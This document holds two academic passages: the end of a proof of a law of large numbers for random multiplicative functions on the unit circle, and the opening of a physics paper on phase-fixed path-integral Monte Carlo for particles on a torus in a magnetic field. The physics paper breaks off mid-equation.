In this section, $(X_p)_{p \in \mathcal{P}}$ are i.i.d., with any distribution on the unit circle. We will study the empirical distribution of $(X_n)_{n \geq 1}$, but not of the patterns $(X_{n+1}, \dots, X_{n+k})_{n \geq 1}$ for $k \geq 2$.
More precisely, the goal of the section is to prove a strong law of large numbers for $N^{-1} \sum_{n=1}^N \delta_{X_n}$ when $N$ goes to infinity. We will use the following result, due to Hal\'asz, Montgomery and Tenenbaum (see \cite{GS}, \cite{M}, \cite{Te} p. 343):
\begin{proposition} \label{HMT}
Let $(Y_n)_{n \geq 1}$ be a multiplicative function such that $|Y_n| \leq 1$ for all $n \geq 1$. For $N \geq 3, T > 0$, we set
$$M(N,T) := \underset{|\lambda| \leq 2T} {\min}
\sum_{p \in \mathcal{P}, p \leq N}
\frac{1 - \Re (Y_p p^{-i\lambda})}{p}.$$
Then:
$$\left|\frac{1}{N} \sum_{n=1}^N Y_n \right|
\leq C \left[(1 + M(N,T)) e^{- M(N,T) } + T^{-1/2} \right],$$
where $C > 0$ is an absolute constant.
\end{proposition}
From this result, we show the following:
\begin{proposition}
Let $(Y_n)_{n \in 1}$ be a random multiplicative function such that $(Y_p)_{p \in \mathcal{P}}$ are i.i.d., with $\mathbb{P} [|Y_p| \leq 1] = 1$, and $\mathbb{P} [Y_p = 1] < 1$. Then, almost surely,
for all $c \in (0, 1 - \mathbb{E}[\Re(Y_2)])$
$$\frac{1}{N} \sum_{n=1}^N Y_n
= O((\log N)^{-c}).$$
\end{proposition}
\begin{proof}
First, we observe that for $1 < N' < N$ integers, $\lambda > 0$,
$$\sum_{p \in \mathcal{P}, N' < p \leq N}
p^{-1 - i\lambda} =
\int_{N'}^{N} \frac{d \theta(x)}{x^{1+i \lambda} \log x} = \left[ \frac{\theta(x)}{x^{1+i \lambda} \log x} \right]_{N'}^N
+ \int_{N'}^{N} \left( \frac{(1+i \lambda)}{x^{2 + i \lambda} \log x}
+ \frac{1}{x^{1 + i \lambda} \, x \log^2 x} \right) \theta(x) dx,$$
where, by a classical refinement of the prime number theorem,
$$\theta(x) := \sum_{p \in \mathcal{P},
p \leq x} \log p = x + O_A(x/\log^{A} x)$$
for all $A > 1$.
The bracket is dominated by $1/\log (N')$, the second part of the last integral is dominated by
$$\int_{N'}^{\infty} \frac{dx}{x \log^2 x} = \int_{\log N'}^{\infty} \frac{dy}{y^2} = 1/\log (N'),$$
and the error term of the first part is dominated by $(1+\lambda)/ \log^{A} (N')$. Hence
$$\sum_{p \in \mathcal{P}, N' < p \leq N} p^{-1-i\lambda}= I_{N',N, \lambda} + O_A \left( \frac{1}{\log N'} +
\frac{\lambda}{ \log^{A} N'} \right),$$
where
$$I_{N',N, \lambda} = (1+i\lambda) \int_{N'}^{N} \frac{dx}{x^{1 + i \lambda} \log x} =
(1+i\lambda) \int_{\lambda \log N'}^{ \lambda \log N}
\frac{e^{-i y}}{y} dy.
$$
Now, for all $a \geq 1$,
$$\int_{a}^{\infty} \frac{e^{-i y}}{y} dy = \left[ \frac{e^{-i y}}{-iy} \right]_a^{\infty}
- \int_{a}^{\infty} \frac{e^{-i y}}{iy^2} dy = O(1/a),$$
which gives
$$I_{N',N, \lambda}
= \int_{\lambda \log N'}^{ \lambda \log N}
\frac{e^{-i y}}{y} dy
+ O(1/\log N').$$
Now, the integral of $(\sin y)/y$ on $\mathbb{R}_+$ is conditionally convergent, and then uniformly bounded in any interval, which implies
$$\Im(I_{N',N,\lambda}) = O(1).$$
We deduce
$$\Im \left(\sum_{ p \in \mathcal{P},
N' < p \leq N} p^{-1-i\lambda} \right)
= O_A \left( 1 + \frac{\lambda}{\log^A N'} \right).$$
Bounding the sum on primes smaller than $N'$ by taking the absolute value, we get:
$$\left|\Im \left(\sum_{ p \in \mathcal{P},
p \leq N}
p^{-1-i\lambda} \right) \right|
\leq \log \log (3+N') + O_A \left( 1 + \frac{\lambda}{\log^A N'} \right),$$
and then by taking $N' = e^{(\log N)^{10/A}}$, for $N$ large enough depending on $A$,
$$\left| \Im \left(\sum_{ p \in \mathcal{P},
p \leq N}
p^{-1-i\lambda} \right) \right|
\leq \frac{ 10\log \log N}{A} + O_A \left( 1 + \frac{\lambda}{\log^{10} N} \right),
$$
$$\underset{N \rightarrow \infty}{\lim \sup} \sup_{0 < \lambda \leq \log^{10} N}
(\log \log N)^{-1} \left|\Im \left(\sum_{ p \in \mathcal{P},
p \leq N}
p^{-1-i\lambda} \right) \right|
\leq 10/A,$$
and then by letting $A \rightarrow \infty$ and using the symmetry of the imaginary part for $\lambda \mapsto -\lambda$,
$$ \sup_{|\lambda| \leq \log^{10} N} \left|\Im \left(\sum_{ p \in \mathcal{P},
p \leq N}
p^{-1-i\lambda} \right) \right|
= o(\log \log N)$$
for $N \rightarrow \infty$.
Now, for all $\rho$ whose real part
is in $[-1,1)$, we have
\begin{align*}\min_{|\lambda| \leq \log^{10} N} \sum_{p \in \mathcal{P}, p \leq N}
\frac{1 - \Re(\rho \, p^{-i \lambda})}{p}
& \geq
\min_{|\lambda| \leq \log^{10} N} \sum_{p \in \mathcal{P}, p \leq N}
\frac{1 - \Re(\rho) \Re( p^{-i \lambda})}{p}
\\ & - \max_{|\lambda| \leq \log^{10} N} \left| \sum_{p \in \mathcal{P}, p \leq N}
\frac{\Im(\rho) \Im( p^{-i \lambda})}{p} \right|.
\end{align*}
The first term is at least the sum of
$1 - \Re(\rho)$ divided by $p$, and then at least $[1 - \Re(\rho) + o(1)] \log \log N$. The second term is $o(\log \log N)$ by the previous discussion. Hence,
\begin{equation}\min_{|\lambda| \leq \log^{10} N} \sum_{p \in \mathcal{P}, p \leq N}
\frac{1 - \Re(\rho \, p^{-i \lambda})}{p} \geq [1 - \Re(\rho) + o(1)] \log \log N. \label{eqrho}
\end{equation}
In fact, we have equality, as we check by taking $\lambda = 0$.
Now, let $\rho := \mathbb{E}[Y_2]$, and
$Z_{p,\lambda} := \Re[(Y_p - \rho)
p^{-i\lambda}]$. The variables
$(Z_{p,\lambda})_{p \in \mathcal{P}}$ are centered, independent,
bounded by $2$. By Hoeffding's lemma,
for all $u \geq 0$,
$$\mathbb{E}[e^{u Z_{p,\lambda}/p}]
\leq e^{2(u/p)^2},$$
and then by independence,
$$\mathbb{E}[e^{u \sum_{p \in \mathcal{P}, p \leq N} Z_{p,\lambda}/p}] \leq e^{2u^2 \sum_{p \in \mathcal{P}, p \leq N} p^{-2}} \leq e^{2u^2 (\pi^2/6)} \leq e^{4u^2},$$
\begin{align*} \mathbb{P} \left[
\sum_{p \in \mathcal{P}, p \leq N} \frac{Z_{p,\lambda}}{p}
\geq (\log \log N)^{3/4} \right]
& \leq e^{-(\log \log N)^{3/2} / 8}
\mathbb{E} \left[ e^{(1/8)(\log \log N)^{3/4} \sum_{p \in \mathcal{P}, p \leq N} \frac{Z_{p,\lambda}}{p} } \right]
\\ & \leq e^{-(\log \log N)^{3/2} / 8}
e^{4 [(1/8)(\log \log N)^{3/4}]^2}
= e^{- (\log \log N)^{3/2} / 16}.
\end{align*}
Applying the same inequality to $-Z_{p, \lambda}$, we deduce
$$\mathbb{P} \left[ \left|
\sum_{p \in \mathcal{P}, p \leq N} \frac{\Re[(Y_p- \rho)p^{-i\lambda}] }{p} \right|
\geq (\log \log N)^{3/4} \right]
\leq 2 e^{- (\log \log N)^{3/2} / 16},$$
$$\mathbb{P} \left[ \max_{|\lambda| \leq
\log^{10} N, \lambda \in (\log^{-1} N) \mathbb{Z} } \left|
\sum_{p \in \mathcal{P}, p \leq N} \frac{\Re[(Y_p- \rho)p^{-i\lambda}] }{p} \right|
\geq (\log \log N)^{3/4} \right]
= O\left( \log^{11}N \, e^{- (\log \log N)^{3/2} /16} \right).$$
The derivative of the last sum
in $p$ with respect to $\lambda$ is dominated by
$$ \sum_{p \in \mathcal{P}, p \leq N}
\frac{\log p}{p} = O(\log N)$$
and then the sum cannot vary more than
$O(1)$ when $\lambda$ runs between two consecutive multiples of $\log^{-1} N$.
Hence,
\begin{align*}
\mathbb{P} \left[ \max_{|\lambda| \leq
\log^{10} N} \left|
\sum_{p \in \mathcal{P}, p \leq N} \frac{\Re[(Y_p- \rho)p^{-i\lambda}] }{p} \right|
\geq (\log \log N)^{3/4} + O(1) \right]
& = O \left( (\log N)^{11 - \sqrt{\log \log N}/16} \right)
\\& = O(\log^{-10} N).
\end{align*}
If we define, for $k \geq 1$, $N_k$ as the integer part of $e^{k^{1/5}}$, we deduce, by Borel-Cantelli lemma, that almost surely, for all but finitely many $k \geq 1$,
$$\max_{|\lambda| \leq
\log^{10} N_k} \left|
\sum_{p \in \mathcal{P}, p \leq N_k} \frac{\Re[(Y_p- \rho)p^{-i\lambda}] }{p} \right| \leq (\log \log N_k)^{3/4} + O(1).$$
If this event occurs, we deduce, using \eqref{eqrho},
$$\min_{|\lambda| \leq \log^{10} N_k} \sum_{p \in \mathcal{P}, p \leq N}
\frac{1 - \Re(Y_p \, p^{-i \lambda})}{p} \geq [1 - \Re(\rho) + o(1)] \log \log N_k.$$
Then, by Proposition \ref{HMT}, we get
$$\left|\frac{1}{N_k}
\sum_{n=1}^{N_k} Y_n \right|
\leq C \left[ \left( 1 +
[1 - \Re(\rho) + o(1)] \log \log N_k
\right) (\log N_k)^{-(1 - \Re(\rho)) + o(1)} + \sqrt{2} \, \log^{-5} N_k \right].$$
Since $- (1 - \Re(\rho)) \geq -2 > -5$, we deduce
$$\left|\frac{1}{N_k}
\sum_{n=1}^{N_k} Y_n \right| =
O((\log N_k)^{-(1 - \Re(\rho)) + o(1)}),$$
which gives the claimed result along the sequence $(N_k)_{k \geq 1}$.
Now, if $N \in [N_k, N_{k+1}]$, we have, since all the $Y_n$'s have modulus at most $1$,
\begin{align*}
\left|\frac{1}{N_k}
\sum_{n=1}^{N_k} Y_n
- \frac{1}{N} \sum_{n=1}^{N} Y_n
\right|
& \leq
\left| \frac{1}{N} \sum_{n=N_k+1}^N Y_n
\right| + \left( \frac{1}{N_k} - \frac{1}{N} \right) \left|\sum_{n=1}^{N_k} Y_n \right|
\leq \frac{N - N_k}{N} + N_k \left(\frac{1}{N_k} - \frac{1}{N} \right)
\\ & = \frac{2(N - N_k)}{N}
\leq \frac{2 (e^{(k+1)^{1/5}} - e^{k^{1/5}} + 1)}{e^{k^{1/5}} - 1}
= O \left(e^{(k+1)^{1/5} - k^{1/5}} - 1 + e^{-k^{1/5}} \right)
\\ & = O( k^{-4/5} ) = O(\log^{-4} N).
\end{align*}
This allows to remove the restriction to the sequence $(N_k)_{k \geq 1}$.
\end{proof}
Using Fourier transform, we deduce a law of large numbers for the empirical measure $\mu_{N} = \frac{1}{N} \sum_{n=1}^N \delta_{X_n}$, under the assumptions of this section.
\begin{proposition}
If for all integers $q \geq 1$, $\mathbb{P} [X_2 \in \mathbb{U}_q] < 1$, then almost surely, $\mu_N$ tends to the uniform measure on the unit circle.
\end{proposition}
\begin{proof}
For all $m \neq 0$, $X_2^m$ takes its values on the unit circle, and it is not a.s. equal to $1$. Applying the previous proposition to $Y_n = X_n^m$, we deduce that $\hat{\mu}_N(m)$ tends to zero almost surely, which gives the desired result.
\end{proof}
\begin{proposition}
If for $q \geq 2$, $X_2 \in \mathbb{U}_q$ almost surely, but $\mathbb{P} [X_2 \in \mathbb{U}_r] < 1$ for all strict divisors $r$ of $q$, then almost surely, $\mu_N$ tends to the uniform measure on $\mathbb{U}_q$. More precisely, almost surely, for all $t \in \mathbb{U}_q$, the proportion of $n \leq N$ such that $X_n = t$ is $q^{-1} + O((\log N)^{-c})$, as soon as
$$c < \inf_{1 \leq m \leq q-1}
\left(1 - \mathbb{E}[\Re(X_2^m)] \right),$$
this infimum being strictly positive.
\end{proposition}
\begin{proof}
The infimum is strictly positive since by assumption, $\mathbb{P}[X_2^m = 1] < 1$ for all $m \in \{1, \dots, q-1\}$.
Now, we apply the previous result to $Y_n = X_n^m$ for all $m \in \{1, \dots, q-1\}$, and we get the claim after doing a discrete Fourier inversion.
\end{proof}
| 2024-02-18T23:40:09.664Z | 2017-02-07T02:08:10.000Z | algebraic_stack_train_0000 | 1,503 | 15,013 |
|
proofpile-arXiv_065-7425 | \section{Introduction}
The path-integral Monte Carlo (PIMC) method \cite{Ceperley95} lets us simulate many-body systems at finite temperature
in a controlled manner.
Equilibrium properties are obtained from the many-body density matrix
\begin{equation}
\label{eq:dm}
\rho(R,R';\beta) = \sum_{n}e^{-\beta\epsilon_n}\Psi_n(R)\Psi^\ast_n(R'),
\end{equation}
where $R\equiv(\mathbf r_1,\mathbf r_2,\dots,\mathbf r_N)$ collects $dN$ particle coordinates,
$d$ is the dimensionality of the system, $N$ is the number of particles,
$\{\Psi_n\}$ is a complete set of many-body eigenstates, and $\{\epsilon_n\}$ are the corresponding energies.
The convolution identity of the density matrix,
\begin{equation}
\label{eq:conv}
\rho(R,R';\beta_1+\beta_2) = \int dR'' \rho(R,R'';\beta_1)\rho(R'',R';\beta_2),
\end{equation}
is applied iteratively to yield the imaginary-time path-integral representation
\begin{multline}
\label{eq:pathint}
\rho(R,R';\beta) = \int dR_1\cdots\int dR_{M-1} \rho(R,R_1;\tau)\\
\times\rho(R_1,R_2;\tau)\dots\rho(R_{M-1},R';\tau).
\end{multline}
Here, the time-step $\tau\equiv\beta/M$ corresponds to a much higher temperature than the system temperature.
The high-temperature density matrix that connects adjacent slices,
$\rho(R_{m-1},R_m;\tau)$, can be approximated by several plausible schemes \cite{Ceperley95}.
Estimators of physical quantities are defined by integrals that involve $\rho(R,R';\beta)$;
in most cases the diagonal element $\rho(R,R;\beta)$ is sufficient.
The Metropolis-Hastings Monte Carlo method \cite{Metropolis53,Hastings70} is applicable to path integration
if the product of high-temperature density matrices in Eq.~(\ref{eq:pathint})
can be interpreted as a probability density function.
For time-reversal invariant bosonic systems this always holds,
and PIMC is an unbiased and essentially exact method in this case.
For fermions, however, the notorious sign problem arises, because the contribution of a particular path
can have either sign due to the presence of nondiagonal factors $\rho(R_{m-1},R_m;\tau)$
in the integrand of estimators.
The generic means to overcome this problem,
the use of restricted or constrained paths that avoid the nodal surfaces of a preconceived
trial many-body density matrix \cite{Ceperley91,Ceperley96}, makes PIMC variational in character.
On the other hand, if time-reversal is not a symmetry of the system,
either because charged particles are exposed to an external magnetic field or the system is rotated,
the density matrices are complex-valued in general
and hence the prescription of the nodal surfaces is insufficient.
A consequent method would be to sample paths by the probability density function (PDF)
$\prod_{m=1}^{M}|\rho(R_{m-1},R_m;\tau)|$ (here we assume integration with the diagonal
density matrix as the kernel of the estimator, and define $R=R'\equiv R_0=R_M$),
and sum them up with the complex phase factor $\prod_{m=1}^{M}\frac{\rho(R_{m-1},R_m;\tau)}{|\rho(R_{m-1},R_m;\tau)|}$.
This procedure would result in a more severe form of the sign problem: contributions with different
phase factors would cancel almost completely.
This issue is equally severe for bosons and fermions, and arises even
in the nonphysical case of distinguishable particles (``bolzmannons'').
In analogy to the phase-fixing extension \cite{Ortiz93,Bolton96} of zero-temperature
methods such as diffusion quantum Monte Carlo \cite{Foulkes01},
phase fixing is an obvious route to adapt PIMC to such problems.
Unlike the case of zero-temperature methods, the function whose phase needs to be fixed
is the many-body density matrix in Eq.~(\ref{eq:dm}), not a wave function.
While the fixed-phase extension of the PIMC method is often mentioned in the literature \cite{Akkineni08},
it is hardly ever applied, in contrast to the similar extension of zero-temperature methods
\cite{Ortiz93,Melik-Alaverdian95,Bolton96,Melik-Alaverdian97}.
We address several issues related to the use of PIMC in time-reversal non-invariant bulk systems.
(Finite systems such as quantum dots are not our primary interest here.)
First, if we want to simulate bulk systems consequently, we have to use periodic boundary conditions,
possibly with twist angles that let us reduce finite-size effects such as shell effects
in finite-size representations of Fermi liquids \cite{Lin01}, which have analogs in strongly
correlated electron systems in magnetic fields \cite{Shao15}.
One should base any PIMC simulation on the single-particle thermal density matrix (equivalently, kinetic action)
that is exact under the chosen boundary conditions.
We show that the free propagation of a charged particle (equivalently, the thermal density matrix)
on a flat torus subjected to a perpendicular magnetic field already exhibits a rather rich structure,
although these patterns lose their significance for small imaginary times or large system sizes.
We provide several closed-form expressions utilizing Jacobi elliptic functions for such a propagator in Sec.~\ref{sec:freedm},
with a detailed derivation delegated to the Appendix.
This result lets us define the kinetic action in a way that is compatible with the torus.
The PIMC method is applicable beyond toy models only because the sampling of paths could be made efficient
by the introduction of multi-slice moves.
These replace entire segments of the path \cite{Pollock84}
according to the PDF $\prod_{m=1}^{M}\rho(R_{m-1},R_m;\tau)$.
If, however, the density matrix is complex-valued and the probability density of paths
is determined by its magnitude, the familiar bisection method \cite{Ceperley95}
that relies on the L\'evy construction of a Brownian bridge, runs into difficulties
because the convolution property in Eq.~(\ref{eq:conv}) is not applicable to magnitudes.
In Sec.~\ref{multislice} we elaborate a nonrecursive variant of the multi-slice move algorithm
that is efficient in the presence of a magnetic field.
As a by-product, we also present an adaptation of the bisection method under periodic boundary conditions
for time-reversal-invariant systems.
Finally, we demonstrate the use of phase-fixed PIMC for bulk systems
in a case study of rotating two-dimensional Yukawa gases.
Yukawa bosons arise either in type-II superconductors, where the Abrikosov vortex
lines interact by a repulsive modified-Bessel-function potential $\propto K_0(r)$ \cite{Nelson89,Magro93,Nordborg97},
or in strongly interacting Fermi-Fermi mixtures of ultracold atoms, if the mass ratio of the
two species, $M/m$, is very far from unity and the motion of both species is confined to two dimensions \cite{Petrov07}.
A flux density can be introduced to cold atomic systems by rotating the gas, a technique that has been applied frequently
in the last two decades \cite{Madison00,AboShaeer01,Hodby01,Haljan01}.
In the model we consider particles that interact via a modified-Bessel-function potential $\propto K_0(r)$.
This is a good approximation also to the inter-atomic interaction in a Fermi-Fermi mixture at sufficiently
long range \cite{Petrov07}.
We do not claim, however, to represent either problem faithfully:
we do not include the nonuniversal short-range repulsion between Fermi-Fermi bound states,
and the inclusion of additional flux density would be difficult to justify for Abrikosov vortices.
We have deliberately chosen this system for computational convenience in order to demonstrate the adequacy of our methodology.
On the one hand, $K_0(r)$ is mildly divergent at short range, thus even the simplest approximation
to the high-temperature density matrix, the primitive action, is a reasonable starting point.
On the other, as $K_0(r)$ decays exponentially at large range, the intricacies of Ewald summation can be avoided.
As a first approach, we use the density matrix of the free Bose and Fermi gases to
fix the phase of the many-body density matrix.
We are encouraged in this by the fact that in the case of the node fixing problem,
which arises analogously for time-reversal invariant fermionic systems, significant
progress was possible both for $^3$He \cite{Ceperley92} and the hydrogen plasma \cite{Pierleoni94,Magro96}
using the nodal surfaces of either the noninteracting system or some well-tested variational ground state wave function.
(The two approaches are somewhat complementary.)
Simple as it is, we demonstrate that phase-fixed PIMC captures the crystallization
of rotating Yukawa bosons and fermions as a function of interaction strength, flux density, and temperature.
We emphasize that unlike for the diffusion Monte Carlo or Green's Function Monte Carlo methods,
no trial wave function of the proper symmetry serves as input to such a calculation;
but we do choose the aspect ratio of the unit cell so that
it can accommodate a finite piece of a triangular lattice.
The paper is structured as follows.
In Sec.~\ref{sec:freedm} we present the density matrix for a single particle in a magnetic field
on the torus, with some mathematical details of the derivation delegated to Appendix \ref{app:dm},
and the considerations of its efficient computation to Appendix \ref{app:comput}.
The adaptation of the multi-slice sampling algorithm is discussed in Sec.~\ref{multislice}.
Sec.~\ref{yukawa} presents a case study, where the phase-fixed path-integral Monte Carlo method
is applied to rotating systems of two-dimensional Yukawa gases under periodic boundary conditions.
In Sec.~\ref{conclusion} we summarize our results and discuss further research directions.
Appendix \ref{app:pfaction} presents the technical details of the phase-fixing methodology for PIMC.
\section{The thermal density matrix}
\label{sec:freedm}
We consider a flat torus pierced by a perpendicular magnetic field.
Consider the parallelogram spanned by two nonparallel vectors $\mathbf L_1=(L_1,0)$ and
$\mathbf L_2=(L_2\cos\theta,L_2\sin\theta)$.
A torus is obtained by identifying the the opposite sides of this unit cell, c.f.\ Fig.~\ref{fig:domain}(a).
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=.49\columnwidth]{basecell}
\includegraphics[width=.49\columnwidth]{quadruplecell}
\end{center}
\caption{\label{fig:domain}
(a) The principal domain of the torus.
We also depict $\mathbf L_1$, $\mathbf L_2$ and $\theta$ as defined in the text;
we identify the plane with the complex plane, and indicate the corners of the
principal domain using the complex parameter $\tau$ defined in Eq.~(\ref{eq:deftau}).
(b) The quadruple domain used for finding the zeros of the density matrix in the low-temperature limit.
}
\end{figure}
We will refer to a similar parallelogram that has the origin as its center as the principal domain.
We use the Landau gauge $\mathbf A = -By\mathbf{\hat x}$ throughout this article.
Electrons are characterized by complex coordinates $z=x+iy$,
and we define
\begin{equation}
\label{eq:deftau}
\tau=\frac{L_2}{L_1}e^{i\theta},
\end{equation}
so that $L_1$ and $L_1\tau$ span the parallelogram on the complex plane.
In the presence of a perpendicular magnetic field, magnetic translations \cite{Zak64} are useful:
\begin{equation}
\label{eq:translation}
t(\mathbf L)=\exp\left(\frac{i}{\hbar}\mathbf L\cdot\mathbf p-i\frac{\mathbf{\hat z}\cdot(\mathbf L\times\mathbf r)}{\ell^2}
\right),
\end{equation}
where $\mathbf p=\frac{\hbar}{i}\nabla - e\mathbf A$.
In the current gauge, these act as $t(\mathbf L)\psi(\mathbf r) =
\exp(\frac{ix\mathbf{\hat y}\cdot\mathbf L}{\ell^2})\psi(\mathbf r+\mathbf L)$.
We will require each state and the implied density matrix to obey twisted boundary conditions
with twist angles $\phi_{1,2}$,
\begin{equation}
\label{eq:twisted}
t(\mathbf L_{1,2})\psi(\mathbf r)=e^{i\phi_{1,2}}\psi(\mathbf r).
\end{equation}
The two conditions are mutually compatible only if the parallelogram is pierced by an integral number of flux quanta,
\begin{equation}
N_\phi=\frac{\left|\mathbf L_1\times\mathbf L_2\right|}{2\pi\ell^2}
=\frac{L_1 L_2\sin\theta}{2\pi\ell^2}.
\end{equation}
Then the principal domain is also a magnetic unit cell.
If $N_\phi\Re\tau=k$ is an integer, i.e.,
\begin{equation}
\label{eq:restriction}
L_2\cos\theta=\frac{kL_1}{N_\phi},
\end{equation}
straightforward but tedious algebra yields the single-particle density matrix
\begin{multline}
\label{eq:second}
\rho^\text{PBC}(\mathbf r,\mathbf r';\beta) =
\frac{1}{N_\phi}\rho^\text{open}(\mathbf r,\mathbf r';\beta)\\
\times\sum_{m=0}^{N_\phi-1}\left\{
\vartheta\begin{bmatrix} 0 \\ a_m \end{bmatrix}\left(z_1\Big|\tau_1\right)
\vartheta\begin{bmatrix} 0 \\ 2b_m' \end{bmatrix}(z_2|\tau_2)+\right.\\
\left.+(-1)^k\vartheta\begin{bmatrix} 0 \\ a_m+\frac{1}{2} \end{bmatrix}\left(z_1\Big|\tau_1\right)
\vartheta\begin{bmatrix} \frac{1}{2} \\ 2b_m' \end{bmatrix}(z_2|\tau_2)
\right\},
\end{multline}
where we have factored out $\rho^\text{open}$, the density matrix for open boundary conditions:
\begin{multline}
\label{eq:openbc}
\rho^\text{open}(\mathbf r,\mathbf r';\beta)=\frac{1}{2\pi\ell^2}\frac{\sqrt u}{1-u}\\
\times\exp\left(-\frac{1+u}{1-u}\frac{\left|\mathbf r-\mathbf r'\right|^2}{4\ell^2}+\frac{i(x'-x)(y+y')}{2\ell^2}\right),
\end{multline}
where $\ell=\sqrt{\frac{\hbar}{eB}}$ is the magnetic length, $u=e^{-\beta\hbar\omega_c}$,
and $\omega_c=\frac{eB}{m}$ is the cyclotron frequency \cite{comment3}.
Above, we have used Jacobi elliptic functions with characteristics \cite{Mumford87,comment1}
\begin{equation}
\label{eq:theta}
\vartheta\begin{bmatrix} a \\ b \end{bmatrix}(z|\tau) = \sum_ne^{i\pi\tau(n+a)^2+2i(n+a)(z+b\pi)}.
\end{equation}
The arguments in Eq.~(\ref{eq:second}) are defined as
\begin{equation}
\begin{split}
\tau_1&=\frac{i}{\pi}\left(\frac{L_1}{2\ell N_\phi}\right)^2\frac{1+u}{1-u},\\
z_1&=\frac{L_1}{4\ell^2 N_\phi}\left(y+y' + i(x'-x)\frac{1+u}{1-u}\right),\\
\tau_2&=i\pi\left(\frac{2\ell N_\phi}{L_1}\right)^2\frac{1+u}{1-u},\\
z_2&=\frac{N_\phi\pi}{L_1}\left(x+x' + i(y-y')\frac{1+u}{1-u}\right);
\end{split}
\label{eq:zdef}
\end{equation}
and the constants related to boundary conditions are
\begin{equation}
\label{eq:abdef}
\begin{split}
a_m&=\frac{\phi_1}{2\pi N_\phi} + \frac{m}{N_\phi}, \\
b_m&=-\frac{\phi_2}{2\pi} - \frac{N_\phi\Re\tau}{2}, \\
b_m'&=b_m+N_\phi a_m\Re\tau.
\end{split}
\end{equation}
The derivation of Eq.~(\ref{eq:second}) is delegated to Appendix \ref{app:dm}.
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=0.49\columnwidth]{tempmove1}
\includegraphics[width=0.49\columnwidth]{tempmove2}
\includegraphics[width=0.49\columnwidth]{tempmove3}
\includegraphics[width=0.49\columnwidth]{tempmove4}
\end{center}
\caption{\label{fig:tempmove}
The dependence of $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$ on imaginary time $\beta$.
There are $N_\phi=6$ flux quanta in the principal domain, $L_2/L_1=1.17$, $\theta\approx55^\circ$,
$\phi_1=\phi_2=0$, and we have fixed $\mathbf r'$ at the origin.
The panels correspond to $\beta\hbar\omega_c=0.3$, 0.7, 1.1, and 5, respectively.
}
\end{figure}
The behavior of the density matrix is shown in Fig.~\ref{fig:tempmove} for the
most general case, an oblique unit cell.
For small imaginary time (high temperature) $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$
has a small Gaussian peak around $\mathbf r'$, which is fixed at the origin in the figure.
This peak spreads out by diffusion as $\beta$ is increased,
and eventually the Gaussians from neighboring unit cells start to overlap appreciably.
However, the density matrix also has a phase due to the external magnetic field,
which gives rise to an interference pattern in this time range.
There is destructive interference at certain points, which effectively arrest the diffusion.
(We will analyze the zeros of $\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)$ below.)
Beyond a certain value of $\beta$ the picture is essentially stationary.
We note that $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$ is \textit{not} invariant for a simultaneous displacement
of both $\mathbf r$ and $\mathbf r'$ by the same vector $\mathbf d$,
which corresponds to choosing a shifted magnetic unit cell on the plane
for compactification by periodic boundary conditions, except for special choices of $\mathbf d$.
This is understood easily by noting that the second characteristic $b_m$ appears in Eq.~(\ref{eq:theta})
as a simple additive constant to the variable $z$, letting us rewrite Eq.~(\ref{eq:second}) as
\begin{widetext}
\begin{multline}
\rho^\text{PBC}(\mathbf r,\mathbf r';\beta) =
\frac{1}{N_\phi}\rho^\text{open}(\mathbf r,\mathbf r';\beta)\\
\times\sum_{m=0}^{N_\phi-1}
\left\{
\vartheta\begin{bmatrix} 0 \\ a_m + \frac{L_1}{4\pi\ell^2N_\phi}(y+y') \end{bmatrix}
\left(\frac{\pi N_\phi\tau_1'}{L_1}(x'-x)\Big|\tau_1'\right)
\vartheta\begin{bmatrix} 0 \\ 2b_m'+\frac{N_\phi}{L_1}(x+x') \end{bmatrix}
\left(\frac{\pi(y-y')\tau_2}{2L_2\sin\theta}\Big|\tau_2\right)+\right.\\
\left.+(-1)^k\vartheta\begin{bmatrix} 0 \\ a_m+\frac{1}{2} + \frac{L_1}{4\pi\ell^2N_\phi}(y+y') \end{bmatrix}
\left(\frac{\pi N_\phi\tau_1'}{L_1}(x'-x)\Big|\tau_1'\right)
\vartheta\begin{bmatrix} \frac{1}{2} \\ 2b_m'+\frac{N_\phi}{L_1}(x+x') \end{bmatrix}
\left(\frac{\pi(y-y')\tau_2}{2L_2\sin\theta}\Big|\tau_2\right)
\right\}.
\end{multline}
\end{widetext}
Then it is clear that the arguments of the theta functions depend on the coordinate differences only,
and the displacement of the center of mass can be incorporated in the characteristics as
\begin{equation}
b_m\to b_m+\frac{N_\phi}{L_1}d_x,\quad
a_m\to a_m+\frac{L_1}{2\pi\ell^2N_\phi}d_y.
\end{equation}
These in turn correspond to fluxes \cite{Aharonov59,Byers61},
and the shift of the center of mass corresponds to a change in the
twist angles according to Eq.~(\ref{eq:abdef}):
\begin{equation}
\phi_2\to\phi_2-\frac{2\pi N_\phi}{L_1}d_x,\quad
\phi_1\to\phi_1+\frac{L_1}{\ell^2}d_y.
\end{equation}
Thus the twisted boundary conditions in Eq.~(\ref{eq:twisted}), and, consequently, $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$,
are invariant only if
\begin{equation}
\label{invariant}
\mathbf d = \left(\frac{L_1}{N_\phi}n_1,\frac{2\pi\ell^2}{L_1}n_2\right)
\end{equation}
for integral $n_1$ and $n_2$.
In the $\beta\to0$ limit the density matrix must satisfy
$\rho(\mathbf r,\mathbf r';\beta)\to\delta(\mathbf r-\mathbf r')$, and this holds for
the density matrix appropriate for open boundary conditions in Eq.~(\ref{eq:openbc}).
Using Eq.~(\ref{eq:second}) and the identities of the traditionally defined Jacobi elliptic functions \cite{comment1}
\[
\vartheta_{3,2}(z|\tau)=\sqrt\frac{i}{\tau}\sum_{n=-\infty}^{\infty}(\pm1)^n\exp\left(-\frac{i\pi}{\tau}\left(n+\frac{z}{\pi}\right)^2\right)
\]
one can check that
\begin{multline}
\rho^\text{PBC}(\mathbf r,\mathbf r';\beta\to0) =\sum_{k_1,k_2}
e^{ik_1\phi_1+ik_2\phi_2-\frac{ixk_2L_2\sin\theta}{\ell^2}}\\
\times\delta\left(x-x'-k_1L_1-k_2L_2\cos\theta\right)\\
\times\delta\left(y-y'-k_2L_2\sin\theta\right),
\end{multline}
which complies with the discrete magnetic translation symmetries
\begin{equation}
\begin{split}
t_{\mathbf r}(n\mathbf L_1+m\mathbf L_2)
